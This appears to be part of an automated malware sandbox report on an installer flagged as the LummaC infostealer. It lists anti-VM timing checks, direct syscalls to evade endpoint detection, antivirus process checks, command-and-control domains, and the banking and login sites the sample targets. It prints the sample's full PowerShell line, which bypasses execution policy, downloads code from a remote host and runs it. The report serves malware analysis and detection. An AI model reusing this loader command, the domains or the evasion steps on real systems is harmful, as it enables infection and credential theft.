              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeRDTSC instruction interceptor: First address: 6BABF3E1 second address: 6BABF3FD instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-20h], eax 0x00000005 mov dword ptr [ebp-1Ch], edx 0x00000008 lea esi, dword ptr [ebp-38h] 0x0000000b xor eax, eax 0x0000000d xor ecx, ecx 0x0000000f cpuid 0x00000011 mov dword ptr [esi], eax 0x00000013 mov dword ptr [esi+04h], ebx 0x00000016 mov dword ptr [esi+08h], ecx 0x00000019 mov dword ptr [esi+0Ch], edx 0x0000001c rdtsc
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeRDTSC instruction interceptor: First address: 6BABF3FD second address: 6BABF3E1 instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-18h], eax 0x00000005 mov dword ptr [ebp-14h], edx 0x00000008 mov eax, dword ptr [ebp-18h] 0x0000000b sub eax, dword ptr [ebp-20h] 0x0000000e mov ecx, dword ptr [ebp-14h] 0x00000011 sbb ecx, dword ptr [ebp-1Ch] 0x00000014 add eax, dword ptr [ebp-10h] 0x00000017 adc ecx, dword ptr [ebp-0Ch] 0x0000001a mov dword ptr [ebp-10h], eax 0x0000001d mov dword ptr [ebp-0Ch], ecx 0x00000020 jmp 00007F2FF073B155h 0x00000022 mov edx, dword ptr [ebp-04h] 0x00000025 add edx, 01h 0x00000028 mov dword ptr [ebp-04h], edx 0x0000002b cmp dword ptr [ebp-04h], 64h 0x0000002f jnl 00007F2FF073B1E0h 0x00000031 rdtsc
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5485Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4291Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-DNDCK.tmp\_isetup\_isdecmp.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-DNDCK.tmp\_isetup\_setup64.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-2E9FA.tmp\_isetup\_isdecmp.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-2E9FA.tmp\_isetup\_setup64.tmpJump to dropped file
              Source: C:\Users\user\Desktop\Set-up.exeAPI coverage: 4.6 %
              Source: C:\Users\user\Desktop\Set-up.exe TID: 5968Thread sleep time: -180000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2180Thread sleep count: 5485 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2180Thread sleep count: 4291 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1576Thread sleep time: -4611686018427385s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0040A326 __EH_prolog,FindFirstFileA,FindFirstFileW,FindFirstFileW,FindFirstFileW,0_2_0040A326
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0040A911 __EH_prolog,FindFirstFileW,GetCurrentDirectoryW,0_2_0040A911
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0040B61F GetSystemInfo,0_2_0040B61F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: Set-up.exe, 00000000.00000003.2143632791.000000000354F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: Set-up.exe, 00000000.00000003.2143632791.000000000354F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
              Source: Set-up.exe, 00000000.00000003.2143632791.000000000354F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: Set-up.exe, 00000000.00000003.2143632791.000000000354F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
              Source: Set-up.exe, 00000000.00000003.2143632791.000000000354F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
              Source: Set-up.exe, 00000000.00000003.2143632791.000000000354F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: Set-up.exe, 00000000.00000003.2215607155.0000000000794000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.000000000074F000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2173803382.0000000000792000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2195047189.0000000000794000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300726639.0000000000794000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2174167112.0000000000792000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2311640082.000000000074F000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2312115290.0000000000794000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Set-up.exe, 00000000.00000003.2143632791.000000000354F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
              Source: Set-up.exe, 00000000.00000003.2143632791.000000000354F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: Set-up.exe, 00000000.00000003.2143632791.000000000354F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: Set-up.exe, 00000000.00000003.2143632791.000000000354F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: Set-up.exe, 00000000.00000003.2143632791.000000000354F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: Set-up.exe, 00000000.00000003.2215607155.0000000000794000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2173803382.0000000000792000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2195047189.0000000000794000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300726639.0000000000794000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2174167112.0000000000792000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2312115290.0000000000794000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2300250399.0000000000794000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWa
              Source: Set-up.exe, 00000000.00000003.2143632791.000000000354F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: Set-up.exe, 00000000.00000003.2143632791.000000000354F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: Set-up.exe, 00000000.00000003.2143632791.000000000354F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
              Source: Set-up.exe, 00000000.00000003.2143632791.000000000354F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: Set-up.exe, 00000000.00000003.2143632791.000000000354F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: Set-up.exe, 00000000.00000003.2143632791.000000000354F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
              Source: Set-up.exe, 00000000.00000003.2143632791.000000000354F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: Set-up.exe, 00000000.00000003.2143632791.000000000354F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
              Source: Set-up.exe, 00000000.00000003.2143632791.000000000354F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
              Source: Set-up.exe, 00000000.00000003.2143632791.000000000354F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
              Source: Set-up.exe, 00000000.00000003.2143632791.000000000354F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: Set-up.exe, 00000000.00000003.2143632791.000000000354F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: Set-up.exe, 00000000.00000003.2143632791.000000000354F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
              Source: Set-up.exe, 00000000.00000003.2143632791.000000000354F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: Set-up.exe, 00000000.00000003.2143632791.000000000354F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
              Source: Set-up.exe, 00000000.00000003.2143632791.000000000354F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: Set-up.exe, 00000000.00000003.2143632791.000000000354F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: Set-up.exe, 00000000.00000003.2143632791.000000000354F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
              Source: Set-up.exe, 00000000.00000003.2143632791.000000000354F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: Set-up.exe, 00000000.00000003.2143632791.000000000354F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: C:\Users\user\Desktop\Set-up.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_004716D4 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004716D4
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00680461 mov edx, dword ptr fs:[00000030h]0_2_00680461
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00680A21 mov eax, dword ptr fs:[00000030h]0_2_00680A21
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00680DD1 mov eax, dword ptr fs:[00000030h]0_2_00680DD1
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00681070 mov eax, dword ptr fs:[00000030h]0_2_00681070
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00681071 mov eax, dword ptr fs:[00000030h]0_2_00681071
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0046E22A SetUnhandledExceptionFilter,0_2_0046E22A
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0046E23C SetUnhandledExceptionFilter,0_2_0046E23C

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Found direct / indirect Syscall (likely to bypass EDR)
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeNtQuerySystemInformation: Direct from: 0x4585B0
              LummaC encrypted strings found
              Source: Set-up.exeString found in binary or memory: rabidcowse.shop
              Source: Set-up.exeString found in binary or memory: noisycuttej.shop
              Source: Set-up.exeString found in binary or memory: tirepublicerj.shop
              Source: Set-up.exeString found in binary or memory: framekgirus.shop
              Source: Set-up.exeString found in binary or memory: wholersorie.shop
              Source: Set-up.exeString found in binary or memory: abruptyopsn.shop
              Source: Set-up.exeString found in binary or memory: nearycrepso.shop
              Source: Set-up.exeString found in binary or memory: laborersquei.click
              Source: Set-up.exeString found in binary or memory: cloudewahsj.shop
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpProcess created: C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe "C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe" /VERYSILENTJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpProcess created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
              Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content; 5x
              Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content; 5xJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
